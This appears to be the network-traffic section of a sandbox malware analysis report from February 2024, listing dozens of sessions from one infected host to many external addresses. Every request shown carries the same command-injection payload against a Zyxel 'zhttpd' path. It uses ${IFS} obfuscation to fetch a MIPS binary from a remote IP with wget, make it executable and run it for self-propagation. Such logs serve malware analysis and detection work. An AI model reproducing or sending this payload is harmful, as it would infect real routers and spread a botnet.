                                                        Feb 2, 2024 06:21:15.024373055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5708192.168.2.1448580106.38.255.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024421930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5709192.168.2.1460896185.226.99.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024458885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5710192.168.2.1441294202.200.148.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024499893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5711192.168.2.1440886204.75.160.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024539948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5712192.168.2.14545561.24.68.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024569988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5713192.168.2.1441594203.221.178.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024595976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5714192.168.2.1441770100.210.6.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024636030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5715192.168.2.144911878.118.4.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024676085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5716192.168.2.1439570197.225.213.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024715900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5717192.168.2.1441748165.36.218.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024765015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5718192.168.2.144831631.192.207.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024802923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5719192.168.2.144320897.181.37.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024832964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5720192.168.2.1442522157.32.128.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024866104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5721192.168.2.1438644112.174.3.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024902105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5722192.168.2.145361684.124.71.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024929047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5723192.168.2.1441382110.177.122.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025003910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5724192.168.2.1434186133.118.41.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025033951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5725192.168.2.1438434109.2.126.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025068998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5726192.168.2.1439328100.219.133.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025096893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5727192.168.2.1434290196.155.54.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025132895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5728192.168.2.1439678191.216.195.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025181055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5729192.168.2.14580722.132.207.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025218010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5730192.168.2.1433032200.239.95.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025260925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5731192.168.2.1436152109.47.97.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025301933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5732192.168.2.143452681.62.142.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025342941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5733192.168.2.145849497.228.87.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025377989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5734192.168.2.144055414.120.210.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025422096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5735192.168.2.145763254.208.7.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025441885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5736192.168.2.144592071.44.61.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025494099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5737192.168.2.143768854.26.198.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025522947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5738192.168.2.1447624208.88.175.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025552034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5739192.168.2.1453668206.109.113.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025604010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5740192.168.2.1433546223.197.31.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025646925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5741192.168.2.145907223.181.206.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025686026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5742192.168.2.1433170194.174.173.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025722027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5743192.168.2.1452980180.238.132.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025733948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5744192.168.2.144715274.82.198.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025789022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5745192.168.2.143604642.36.82.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025836945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5746192.168.2.1460916121.25.248.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025863886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5747192.168.2.143378648.94.201.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025924921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5748192.168.2.145623249.49.122.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025944948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5749192.168.2.1447186205.93.203.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.025978088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5750192.168.2.14467444.81.121.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026019096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5751192.168.2.1451860148.9.93.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026053905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5752192.168.2.1458288201.146.133.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026104927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5753192.168.2.145537466.180.34.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026130915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5754192.168.2.1455924208.218.13.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026165009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5755192.168.2.144424499.146.68.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026202917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5756192.168.2.144155267.146.170.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026251078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5757192.168.2.144734687.131.39.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026290894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5758192.168.2.1459386201.133.45.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026326895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5759192.168.2.144351448.10.24.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026381969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5760192.168.2.1434822180.93.101.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026407003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5761192.168.2.144970070.201.122.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026452065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5762192.168.2.145914051.199.122.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026487112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5763192.168.2.1443738130.10.202.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026549101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5764192.168.2.1441590176.55.158.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026576996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5765192.168.2.145055824.23.202.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026622057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5766192.168.2.145604877.167.114.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026663065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5767192.168.2.144364445.112.177.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026700974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5768192.168.2.1456206129.175.116.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026727915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5769192.168.2.1440478201.87.32.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026765108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5770192.168.2.144415063.178.147.102443
                                                        TimestampBytes transferredDirectionData
